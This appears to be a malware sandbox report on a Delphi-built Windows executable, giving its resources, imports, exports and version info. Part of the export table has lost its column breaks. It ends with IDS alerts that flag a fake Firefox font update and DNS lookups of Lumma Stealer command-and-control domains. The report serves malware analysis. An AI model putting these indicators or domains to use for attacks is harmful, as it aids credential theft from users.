RT_STRING | 0x3d7664 | 0x36c | data | | | 0.410958904109589
RT_STRING | 0x3d79d0 | 0x348 | data | | | 0.3392857142857143
RT_STRING | 0x3d7d18 | 0x478 | data | | | 0.3924825174825175
RT_RCDATA | 0x3d8190 | 0x10 | data | | | 1.5
RT_RCDATA | 0x3d81a0 | 0x2 | data | English | United States | 5.0
RT_RCDATA | 0x3d81a4 | 0x395 | Delphi compiled form 'TForm1' | | | 0.6030534351145038
RT_GROUP_CURSOR | 0x3d853c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x3d8550 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x3d8564 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x3d8578 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x3d858c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x3d85a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x3d85b4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x3d85c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x3d85dc | 0x14 | data | English | United States | 1.15
RT_VERSION | 0x3d85f0 | 0x140 | MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79 | English | United States | 0.55
DLL | Import
ADVAPI32.DLL | RegCloseKey, RegConnectRegistryW, RegCreateKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegFlushKey, RegLoadKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegReplaceKeyW, RegRestoreKeyW, RegSaveKeyW, RegSetValueExW, RegUnLoadKeyW
KERNEL32.DLL | CloseHandle, CompareStringW, CreateEventW, CreateFileA, CreateFileW, CreateThread, DeleteCriticalSection, DeleteFileA, EnterCriticalSection, EnumCalendarInfoW, EnumResourceNamesW, EnumSystemLocalesW, ExitProcess, ExitThread, FileTimeToSystemTime, FindClose, FindFirstFileW, FindResourceW, FormatMessageW, FreeLibrary, FreeResource, GetACP, GetCPInfo, GetCPInfoExW, GetCommandLineW, GetComputerNameW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDateFormatW, GetDiskFreeSpaceW, GetEnvironmentStringsW, GetExitCodeThread, GetFileAttributesA, GetFileAttributesW, GetFileType, GetFullPathNameW, GetLastError, GetLocalTime, GetLocaleInfoA, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStartupInfoW, GetStdHandle, GetStringTypeA, GetStringTypeW, GetSystemDefaultLangID, GetSystemDefaultUILanguage, GetSystemInfo, GetSystemTimes, GetThreadLocale, GetThreadPriority, GetTickCount, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultUILanguage, GetVersion, GetVersionExA, GetVersionExW, GlobalAddAtomW, GlobalAlloc, GlobalDeleteAtom, GlobalFindAtomW, GlobalFree, GlobalLock, GlobalSize, GlobalUnlock, HeapAlloc, HeapCreate, HeapDestroy, HeapFree, HeapSize, InitializeCriticalSection, InterlockedCompareExchange, InterlockedDecrement, InterlockedExchange, InterlockedIncrement, IsDBCSLeadByteEx, IsDebuggerPresent, IsValidLocale, LCMapStringA, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, LoadResource, LocalAlloc, LocalFree, LockResource, MulDiv, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, ResetEvent, ResumeThread, RtlUnwind, SetConsoleCtrlHandler, SetEndOfFile, SetErrorMode, SetEvent, SetFilePointer, SetHandleCount, SetLastError, SetThreadLocale, SetThreadPriority, SizeofResource, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, VirtualQueryEx, WaitForMultipleObjectsEx, WaitForSingleObject, WideCharToMultiByte, WriteFile, lstrcmpW, lstrlenW
VERSION.DLL | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
WINSPOOL.DRV | ClosePrinter, DocumentPropertiesW, EnumPrintersW, OpenPrinterW
COMCTL32.DLL | FlatSB_GetScrollInfo, FlatSB_GetScrollPos, FlatSB_SetScrollInfo, FlatSB_SetScrollPos, FlatSB_SetScrollProp, ImageList_Add, ImageList_BeginDrag, ImageList_Copy, ImageList_Create, ImageList_Destroy, ImageList_DragEnter, ImageList_DragLeave, ImageList_DragMove, ImageList_DragShowNolock, ImageList_Draw, ImageList_DrawEx, ImageList_EndDrag, ImageList_GetBkColor, ImageList_GetDragImage, ImageList_GetIcon, ImageList_GetIconSize, ImageList_GetImageCount, ImageList_GetImageInfo, ImageList_LoadImageW, ImageList_Read, ImageList_Remove, ImageList_Replace, ImageList_ReplaceIcon, ImageList_SetBkColor, ImageList_SetIconSize, ImageList_SetImageCount, ImageList_SetOverlayImage, ImageList_Write, InitializeFlatSB, _TrackMouseEvent
COMDLG32.DLL | GetOpenFileNameW
GDI32.DLL | AbortDoc, AngleArc, Arc, ArcTo, BitBlt, Chord, CombineRgn, CopyEnhMetaFileW, CreateBitmap, CreateBrushIndirect, CreateCompatibleBitmap, CreateCompatibleDC, CreateDCW, CreateDIBSection, CreateDIBitmap, CreateFontIndirectW, CreateHalftonePalette, CreateICW, CreatePalette, CreatePatternBrush, CreatePenIndirect, CreateRectRgn, CreateRoundRectRgn, CreateSolidBrush, DeleteDC, DeleteEnhMetaFile, DeleteMetaFile, DeleteObject, Ellipse, EndDoc, EndPage, EnumFontFamiliesExW, EnumFontsW, ExcludeClipRect, ExtCreatePen, ExtCreateRegion, ExtFloodFill, ExtTextOutW, FrameRgn, GdiFlush, GetBitmapBits, GetBrushOrgEx, GetClipBox, GetCurrentObject, GetCurrentPositionEx, GetDIBColorTable, GetDIBits, GetDeviceCaps, GetEnhMetaFileBits, GetEnhMetaFileDescriptionW, GetEnhMetaFileHeader, GetEnhMetaFilePaletteEntries, GetObjectW, GetPaletteEntries, GetPixel, GetRgnBox, GetStockObject, GetSystemPaletteEntries, GetTextColor, GetTextExtentPoint32W, GetTextExtentPointW, GetTextMetricsW, GetViewportOrgEx, GetWinMetaFileBits, GetWindowOrgEx, IntersectClipRect, LineTo, MaskBlt, MoveToEx, PatBlt, Pie, PlayEnhMetaFile, PolyBezier, PolyBezierTo, PolyPolyline, Polygon, Polyline, RealizePalette, RectVisible, Rectangle, RestoreDC, RoundRect, SaveDC, SelectClipRgn, SelectObject, SelectPalette, SetAbortProc, SetBkColor, SetBkMode, SetBrushOrgEx, SetDIBColorTable, SetDIBits, SetEnhMetaFileBits, SetMapMode, SetPixel, SetROP2, SetStretchBltMode, SetTextColor, SetViewportExtEx, SetViewportOrgEx, SetWinMetaFileBits, SetWindowExtEx, SetWindowOrgEx, StartDocW, StartPage, StretchBlt, StretchDIBits, UnrealizeObject
SHELL32.DLL | Shell_NotifyIconW
USER32.DLL | ActivateKeyboardLayout, AdjustWindowRectEx, BeginPaint, CallNextHookEx, CallWindowProcW, CharLowerBuffW, CharLowerW, CharNextW, CharUpperBuffW, CharUpperW, CheckMenuItem, ChildWindowFromPoint, ClientToScreen, CloseClipboard, CopyIcon, CopyImage, CountClipboardFormats, CreateAcceleratorTableW, CreateCaret, CreateIcon, CreateMenu, CreatePopupMenu, CreateWindowExW, DefFrameProcW, DefMDIChildProcW, DefWindowProcW, DeleteMenu, DestroyAcceleratorTable, DestroyCaret, DestroyCursor, DestroyIcon, DestroyMenu, DestroyWindow, DispatchMessageA, DispatchMessageW, DrawEdge, DrawFocusRect, DrawFrameControl, DrawIcon, DrawIconEx, DrawMenuBar, DrawTextExW, DrawTextW, EmptyClipboard, EnableMenuItem, EnableScrollBar, EnableWindow, EndMenu, EndPaint, EnumChildWindows, EnumClipboardFormats, EnumDisplayMonitors, EnumThreadWindows, EnumWindows, FillRect, FindWindowExW, FindWindowW, FrameRect, GetActiveWindow, GetCapture, GetCaretPos, GetClassInfoExW, GetClassInfoW, GetClassLongW, GetClassNameW, GetClientRect, GetClipboardData, GetCursor, GetCursorPos, GetDC, GetDCEx, GetDesktopWindow, GetDlgCtrlID, GetDlgItem, GetDoubleClickTime, GetFocus, GetForegroundWindow, GetIconInfo, GetKeyNameTextW, GetKeyState, GetKeyboardLayout, GetKeyboardLayoutList, GetKeyboardLayoutNameW, GetKeyboardState, GetLastActivePopup, GetMenu, GetMenuItemCount, GetMenuItemID, GetMenuItemInfoW, GetMenuState, GetMenuStringW, GetMessageExtraInfo, GetMessagePos, GetMessageTime, GetMonitorInfoW, GetParent, GetPropW, GetScrollBarInfo, GetScrollInfo, GetScrollPos, GetScrollRange, GetSubMenu, GetSysColor, GetSysColorBrush, GetSystemMenu, GetSystemMetrics, GetTopWindow, GetUpdateRect, GetWindow, GetWindowDC, GetWindowLongW, GetWindowPlacement, GetWindowRect, GetWindowTextW, GetWindowThreadProcessId, HideCaret, InsertMenuItemW, InsertMenuW, InvalidateRect, IsCharAlphaNumericW, IsCharAlphaW, IsChild, IsClipboardFormatAvailable, IsDialogMessageA, IsDialogMessageW, IsIconic, IsWindow, IsWindowEnabled, IsWindowUnicode, IsWindowVisible, IsZoomed, KillTimer, LoadBitmapW, LoadCursorW, LoadIconW, LoadKeyboardLayoutW, LoadStringW, LockWindowUpdate, MapVirtualKeyW, MapWindowPoints, MessageBeep, MessageBoxA, MessageBoxW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow, MsgWaitForMultipleObjects, MsgWaitForMultipleObjectsEx, OpenClipboard, PeekMessageA, PeekMessageW, PostMessageW, PostQuitMessage, RedrawWindow, RegisterClassW, RegisterClipboardFormatW, RegisterWindowMessageW, ReleaseCapture, ReleaseDC, RemoveMenu, RemovePropW, ScreenToClient, ScrollWindow, ScrollWindowEx, SendMessageA, SendMessageW, SetActiveWindow, SetCapture, SetCaretPos, SetClassLongW, SetClipboardData, SetCursor, SetCursorPos, SetFocus, SetForegroundWindow, SetKeyboardState, SetMenu, SetMenuItemInfoW, SetParent, SetPropW, SetRect, SetScrollInfo, SetScrollPos, SetScrollRange, SetTimer, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowRgn, SetWindowTextW, SetWindowsHookExW, ShowCaret, ShowOwnedPopups, ShowScrollBar, ShowWindow, SystemParametersInfoW, TrackMouseEvent, TrackPopupMenu, TranslateMDISysAccel, TranslateMessage, UnhookWindowsHookEx, UnregisterClassW, UpdateWindow, ValidateRect, WaitMessage, WindowFromPoint, wsprintfA
OLE32.DLL | CLSIDFromProgID, CoCreateGuid, CoCreateInstance, CoInitialize, CoTaskMemAlloc, CoTaskMemFree, CoUninitialize, CreateBindCtx, CreateILockBytesOnHGlobal, GetHGlobalFromILockBytes, IsEqualGUID, OleCreate, OleCreateFromData, OleCreateFromFile, OleCreateLinkFromData, OleCreateLinkToFile, OleDraw, OleGetClipboard, OleGetIconOfClass, OleInitialize, OleIsRunning, OleLoad, OleQueryCreateFromData, OleQueryLinkFromData, OleRun, OleSave, OleSetClipboard, OleSetContainedObject, OleSetMenuDescriptor, OleUninitialize, ProgIDFromCLSID, ReleaseStgMedium, StgCreateDocfile, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, StringFromCLSID
OLEAUT32.DLL | GetActiveObject, GetErrorInfo, SafeArrayCreate, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayPtrOfIndex, SysAllocStringLen, SysFreeString, SysReAllocStringLen, SysStringLen, VariantChangeType, VariantClear, VariantCopy, VariantInit
OLEDLG.DLL | OleUIChangeIconW, OleUIInsertObjectW, OleUIObjectPropertiesW, OleUIPasteSpecialW
Name | Ordinal | Address
@$xp$17Word_2k@TWordFont | 8 | 0x403b94
@$xp$20Excel_2k@TExcelChart | 1704 | 0x7008f4
@$xp$21Access_2k@TAccessForm | 719 | 0x6dd3d4
@$xp$21Word_2k@TWordDocument | 10 | 0x403c88
@$xp$23Access_2k@TAccessReport | 717 | 0x6dd1d0
@$xp$23Excel_2k@TExcelWorkbook | 1700 | 0x70024c
@$xp$24Excel_2k@TExcelOLEObject | 1698 | 0x7000f8
@$xp$24Excel_2k@TExcelWorksheet | 1702 | 0x7006a4
@$xp$24Word_2k@TWordApplication | 2 | 0x403634
@$xp$25Excel_2k@TExcelQueryTable | 1708 | 0x7010dc
@$xp$26Excel_2k@TExcelApplication | 1706 | 0x700bf0
@$xp$26Word_2k@TWordLetterContent | 4 | 0x403994
@$xp$27Access_2k@TAccessReferences | 713 | 0x6dcf68
@$xp$28Access_2k@TAccessApplication | 715 | 0x6dd0c4
@$xp$28Word_2k@TWordParagraphFormat | 6 | 0x403a94
@$xp$ynpqqrp14System@TObject$v | 12 | 0x403de4
@$xp$ynpqqrp14System@TObjectp15Excel_2k@WINDOW$v | 1718 | 0x701f14
@$xp$ynpqqrp14System@TObjectp17Word_2k@_Document$v | 13 | 0x403e2c
@$xp$ynpqqrp14System@TObjectp17Word_2k@_Documentp14Word_2k@WINDOW$v | 16 | 0x40401c
@$xp$ynpqqrp14System@TObjectp17Word_2k@_Documentps$v | 14 | 0x403ea4
@$xp$ynpqqrp14System@TObjectp17Word_2k@_Documentpst3$v | 15 | 0x403f4c
@$xp$ynpqqrp14System@TObjectp18Excel_2k@Hyperlink$v | 1716 | 0x701df4
@$xp$ynpqqrp14System@TObjectp19Excel_2k@ExcelRange$v | 1714 | 0x701ccc
@$xp$ynpqqrp14System@TObjectp19Excel_2k@ExcelRangeps$v | 1715 | 0x701d4c
@$xp$ynpqqrp14System@TObjectp21Word_2k@WordSelection$v | 17 | 0x4040b0
@$xp$ynpqqrp14System@TObjectp21Word_2k@WordSelectionps$v | 18 | 0x404134
@$xp$ynpqqrp14System@TObjectp9IDispatch$v | 1712 | 0x70163c
@$xp$ynpqqrp14System@TObjectp9IDispatchp18Excel_2k@Hyperlink$v | 1713 | 0x701954
@$xp$ynpqqrp14System@TObjectp9IDispatchp19Excel_2k@ExcelRange$v | 1710 | 0x7014cc
@$xp$ynpqqrp14System@TObjectp9IDispatchp19Excel_2k@ExcelRangeps$v | 1711 | 0x701570
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectsps$v17170x701e70
                                                                                                                                                                                                                          @@Access_2k@Finalize24270x719518
                                                                                                                                                                                                                          @@Access_2k@Initialize24260x719508
                                                                                                                                                                                                                          @@Access_2k_srvr@Finalize7220x6dddcc
                                                                                                                                                                                                                          @@Access_2k_srvr@Initialize7210x6dddbc
                                                                                                                                                                                                                          @@Excel_2k@Finalize24290x719538
                                                                                                                                                                                                                          @@Excel_2k@Initialize24280x719528
                                                                                                                                                                                                                          @@Excel_2k_srvr@Finalize17200x7023e0
                                                                                                                                                                                                                          @@Excel_2k_srvr@Initialize17190x7023d0
                                                                                                                                                                                                                          @@Unit1@Finalize200x404ee4
                                                                                                                                                                                                                          @@Unit1@Initialize190x404ed4
                                                                                                                                                                                                                          @@Word_2k@Finalize24310x719558
                                                                                                                                                                                                                          @@Word_2k@Initialize24300x719548
                                                                                                                                                                                                                          @@Word_2k_srvr@Finalize24250x7194f8
                                                                                                                                                                                                                          @@Word_2k_srvr@Initialize24240x7194e8
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessApplication25630x7757a0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessBoundObjectFrame25020x7753d0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessCheckBox24940x775350
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessComboBox25110x775460
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessCommandButton24860x7752d0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessControl24660x775190
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessCustomControl25340x7755d0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessField24590x775120
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessForm25550x775720
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessGroupLevel25460x775690
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessHyperlink24620x775150
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessImage24830x7752a0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessLabel24720x7751f0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessLine24800x775270
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessListBox25080x775430
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessObjectFrame25140x775490
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessOptionButton24890x775300
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessOptionGroup24990x7753a0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessPage24630x775160
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessPageBreak25170x7754c0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessPaletteButton25250x775540
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessRectangle24770x775240
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessReferences25670x7757e0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessReport25590x775760
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessSection25440x775670
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessSubForm25280x775570
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessSubReport25310x7755a0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessTabControl25390x775620
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessTextBox25050x775400
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessToggleButton25200x7754f0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessWebOptions25970x7759c0
                                                                                                                                                                                                                          @Access_2k@CLSID_AllDataAccessPages25770x775880
                                                                                                                                                                                                                          @Access_2k@CLSID_AllDatabaseDiagrams25820x7758d0
                                                                                                                                                                                                                          @Access_2k@CLSID_AllForms25730x775840
                                                                                                                                                                                                                          @Access_2k@CLSID_AllMacros25750x775860
                                                                                                                                                                                                                          @Access_2k@CLSID_AllModules25760x775870
                                                                                                                                                                                                                          @Access_2k@CLSID_AllQueries25790x7758a0
                                                                                                                                                                                                                          @Access_2k@CLSID_AllReports25740x775850
                                                                                                                                                                                                                          @Access_2k@CLSID_AllStoredProcedures25810x7758c0
                                                                                                                                                                                                                          @Access_2k@CLSID_AllTables25780x775890
                                                                                                                                                                                                                          @Access_2k@CLSID_AllViews25800x7758b0
                                                                                                                                                                                                                          @Access_2k@CLSID_Class25990x7759e0
                                                                                                                                                                                                                          @Access_2k@CLSID_CodeData25900x775950
                                                                                                                                                                                                                          @Access_2k@CLSID_CodeProject25890x775940
                                                                                                                                                                                                                          @Access_2k@CLSID_CurrentData25880x775930
                                                                                                                                                                                                                          @Access_2k@CLSID_CurrentProject25870x775920
                                                                                                                                                                                                                          @Access_2k@CLSID_DataAccessPage25700x775810
                                                                                                                                                                                                                          @Access_2k@CLSID_DefaultWebOptions25950x7759a0
                                                                                                                                                                                                                          @Access_2k@CLSID_FormatCondition24540x7750d0
                                                                                                                                                                                                                          @Access_2k@CLSID_WizHook25930x775980
                                                                                                                                                                                                                          @Access_2k@CLSID__CheckBoxInOption24960x775370
                                                                                                                                                                                                                          @Access_2k@CLSID__ChildLabel24740x775210
                                                                                                                                                                                                                          @Access_2k@CLSID__ControlInReportEvents24680x7751b0
                                                                                                                                                                                                                          @Access_2k@CLSID__CustomControlInReport25360x7755f0
                                                                                                                                                                                                                          @Access_2k@CLSID__OptionButtonInOption24910x775320
                                                                                                                                                                                                                          @Access_2k@CLSID__PageHdrFtrInReport25500x7756d0
                                                                                                                                                                                                                          @Access_2k@CLSID__SectionInReport25480x7756b0
                                                                                                                                                                                                                          @Access_2k@CLSID__ToggleButtonInOption25220x775510
                                                                                                                                                                                                                          @Access_2k@DIID__References_Events25660x7757d0
                                                                                                                                                                                                                          @Access_2k@IID_AccessObject25910x775960
                                                                                                                                                                                                                          @Access_2k@IID_AccessObjectProperties25840x7758f0
                                                                                                                                                                                                                          @Access_2k@IID_AccessObjectProperty25830x7758e0
                                                                                                                                                                                                                          @Access_2k@IID_AllObjects25720x775830
                                                                                                                                                                                                                          @Access_2k@IID_Children24570x775100
                                                                                                                                                                                                                          @Access_2k@IID_Controls_24690x7751c0
                                                                                                                                                                                                                          @Access_2k@IID_DataAccessPages25710x775820
                                                                                                                                                                                                                          @Access_2k@IID_DoCmd24490x775080
                                                                                                                                                                                                                          @Access_2k@IID_FormatConditions24550x7750e0
                                                                                                                                                                                                                          @Access_2k@IID_Forms_25560x775730
                                                                                                                                                                                                                          @Access_2k@IID_Module25510x7756e0
                                                                                                                                                                                                                          @Access_2k@IID_Modules25520x7756f0
                                                                                                                                                                                                                          @Access_2k@IID_Pages24640x775170
                                                                                                                                                                                                                          @Access_2k@IID_Properties24520x7750b0
                                                                                                                                                                                                                          @Access_2k@IID_Reference25640x7757b0
                                                                                                                                                                                                                          @Access_2k@IID_Reports25600x775770
                                                                                                                                                                                                                          @Access_2k@IID_Screen25610x775780
                                                                                                                                                                                                                          @Access_2k@IID__AccessField24580x775110
                                                                                                                                                                                                                          @Access_2k@IID__AccessProperty24510x7750a0
                                                                                                                                                                                                                          @Access_2k@IID__Application25620x775790
                                                                                                                                                                                                                          @Access_2k@IID__BoundObjectFrame25000x7753b0
                                                                                                                                                                                                                          @Access_2k@IID__BoundObjectFrameEvents25010x7753c0
                                                                                                                                                                                                                          @Access_2k@IID__CheckBoxEvents24930x775340
                                                                                                                                                                                                                          @Access_2k@IID__CheckBoxInOptionEvents24950x775360
                                                                                                                                                                                                                          @Access_2k@IID__Checkbox24920x775330
                                                                                                                                                                                                                          @Access_2k@IID__ChildLabelEvents24730x775200
                                                                                                                                                                                                                          @Access_2k@IID__ComboBoxEvents25100x775450
                                                                                                                                                                                                                          @Access_2k@IID__Combobox25090x775440
                                                                                                                                                                                                                          @Access_2k@IID__CommandButton24840x7752b0
                                                                                                                                                                                                                          @Access_2k@IID__CommandButtonEvents24850x7752c0
                                                                                                                                                                                                                          @Access_2k@IID__Control24650x775180
                                                                                                                                                                                                                          @Access_2k@IID__CurrentData25860x775910
                                                                                                                                                                                                                          @Access_2k@IID__CurrentProject25850x775900
                                                                                                                                                                                                                          @Access_2k@IID__CustomControl25320x7755b0
Name | Ordinal | Address
@Access_2k@IID__CustomControlEvents | 2533 | 0x7755c0
@Access_2k@IID__CustomControlInReportEvents | 2535 | 0x7755e0
@Access_2k@IID__DataAccessPage | 2569 | 0x775800
@Access_2k@IID__DefaultWebOptions | 2594 | 0x775990
@Access_2k@IID__Dummy | 2568 | 0x7757f0
@Access_2k@IID__DummyEvents | 2598 | 0x7759d0
@Access_2k@IID__Form | 2553 | 0x775700
@Access_2k@IID__FormEvents | 2554 | 0x775710
@Access_2k@IID__FormatCondition | 2453 | 0x7750c0
@Access_2k@IID__GroupLevel | 2545 | 0x775680
@Access_2k@IID__Hyperlink | 2461 | 0x775140
@Access_2k@IID__Image | 2481 | 0x775280
@Access_2k@IID__ImageEvents | 2482 | 0x775290
@Access_2k@IID__ItemsSelected | 2456 | 0x7750f0
@Access_2k@IID__Label | 2470 | 0x7751d0
@Access_2k@IID__LabelEvents | 2471 | 0x7751e0
@Access_2k@IID__Line | 2478 | 0x775250
@Access_2k@IID__LineEvents | 2479 | 0x775260
@Access_2k@IID__ListBox | 2506 | 0x775410
@Access_2k@IID__ListBoxEvents | 2507 | 0x775420
@Access_2k@IID__ObjectFrame | 2512 | 0x775470
@Access_2k@IID__ObjectFrameEvents | 2513 | 0x775480
@Access_2k@IID__OptionButton | 2487 | 0x7752e0
@Access_2k@IID__OptionButtonEvents | 2488 | 0x7752f0
@Access_2k@IID__OptionButtonInOptionEvents | 2490 | 0x775310
@Access_2k@IID__OptionGroup | 2497 | 0x775380
@Access_2k@IID__OptionGroupEvents | 2498 | 0x775390
@Access_2k@IID__Page | 2540 | 0x775630
@Access_2k@IID__PageBreak | 2515 | 0x7754a0
@Access_2k@IID__PageBreakEvents | 2516 | 0x7754b0
@Access_2k@IID__PageEvents | 2541 | 0x775640
@Access_2k@IID__PageHdrFtrInReportEvents | 2549 | 0x7756c0
@Access_2k@IID__PaletteButton | 2523 | 0x775520
@Access_2k@IID__PaletteButtonEvents | 2524 | 0x775530
@Access_2k@IID__RecordsetEvents | 2450 | 0x775090
@Access_2k@IID__Rectangle | 2475 | 0x775220
@Access_2k@IID__RectangleEvents | 2476 | 0x775230
@Access_2k@IID__References | 2565 | 0x7757c0
@Access_2k@IID__Report | 2557 | 0x775740
@Access_2k@IID__ReportEvents | 2558 | 0x775750
@Access_2k@IID__Section | 2542 | 0x775650
@Access_2k@IID__SectionEvents | 2543 | 0x775660
@Access_2k@IID__SectionInReportEvents | 2547 | 0x7756a0
@Access_2k@IID__SubForm | 2526 | 0x775550
@Access_2k@IID__SubFormEvents | 2527 | 0x775560
@Access_2k@IID__SubReport | 2529 | 0x775580
@Access_2k@IID__SubReportEvents | 2530 | 0x775590
@Access_2k@IID__TabControl | 2537 | 0x775600
@Access_2k@IID__TabControlEvents | 2538 | 0x775610
@Access_2k@IID__TextBoxEvents | 2504 | 0x7753f0
@Access_2k@IID__Textbox | 2503 | 0x7753e0
@Access_2k@IID__ToggleButton | 2518 | 0x7754d0
@Access_2k@IID__ToggleButtonEvents | 2519 | 0x7754e0
@Access_2k@IID__ToggleButtonInOptionEvents | 2521 | 0x775500
@Access_2k@IID__WebOptions | 2596 | 0x7759b0
@Access_2k@IID__WizHook | 2592 | 0x775970
@Access_2k@IID___ControlInReportEvents | 2467 | 0x7751a0
@Access_2k@IID___Help | 2460 | 0x775130
@Access_2k@LIBID_Access | 2448 | 0x775070
@Access_2k@TAccessApplication@ | 2439 | 0x754b68
@Access_2k@TAccessApplication@$bctr$qqrp25System@Classes@TComponent | 716 | 0x6dd164
@Access_2k@TAccessApplication@AccessError$qqr10tagVARIANT | 638 | 0x6d8aac
@Access_2k@TAccessApplication@AddAutoCorrect$qqrpbt1 | 631 | 0x6d8820
@Access_2k@TAccessApplication@AddToFavorites$qqrv | 646 | 0x6d8da0
@Access_2k@TAccessApplication@AppLoadString$qqrl | 642 | 0x6d8c60
@Access_2k@TAccessApplication@BeforeDestruction$qqrv | 582 | 0x6d7624
@Access_2k@TAccessApplication@BeginUndoable$qqrl | 624 | 0x6d8670
@Access_2k@TAccessApplication@BuildCriteria$qqrpbst1 | 626 | 0x6d86dc
@Access_2k@TAccessApplication@BuilderString$qqrv | 639 | 0x6d8b1c
@Access_2k@TAccessApplication@CloseCurrentDatabase$qqrv | 590 | 0x6d78f0
@Access_2k@TAccessApplication@CodeDb$qqrv | 623 | 0x6d8620
@Access_2k@TAccessApplication@Connect$qqrv | 580 | 0x6d73cc
Description | Data
FileVersion | 1.0.0.0
ProductVersion | 1.0.0.0
Translation | 0x0804 0x03a8 (decoded: LANGID 0x0804 = Chinese (Simplified, PRC); code page 0x03a8 = 936, GB2312/GBK. The version resource therefore declares a zh-CN locale, which does not match the English/United States compilation-system guess below.)

Language of compilation system | Country where language is spoken | Map
English | United States


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-04-28T19:34:28.895163+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49695 | 172.67.182.68 | 443 | TCP
2025-04-28T19:34:48.826594+0200 | 2061853 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (geographys .run) | 1 | 192.168.2.5 | 57728 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:49.176939+0200 | 2061859 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tropiscbs .live) | 1 | 192.168.2.5 | 60715 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:49.338097+0200 | 2061851 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cartograhphy .top) | 1 | 192.168.2.5 | 59381 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:49.494621+0200 | 2061849 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (biosphxere .digital) | 1 | 192.168.2.5 | 59328 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:49.655128+0200 | 2061857 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (topographky .top) | 1 | 192.168.2.5 | 59371 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:50.084494+0200 | 2061807 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (climatologfy .top) | 1 | 192.168.2.5 | 63921 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:50.242689+0200 | 2061861 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vigorbridgoe .top) | 1 | 192.168.2.5 | 59576 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:51.062891+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49698 | 23.52.218.12 | 443 | TCP
2025-04-28T19:34:52.111729+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49699 | 104.21.36.133 | 443 | TCP
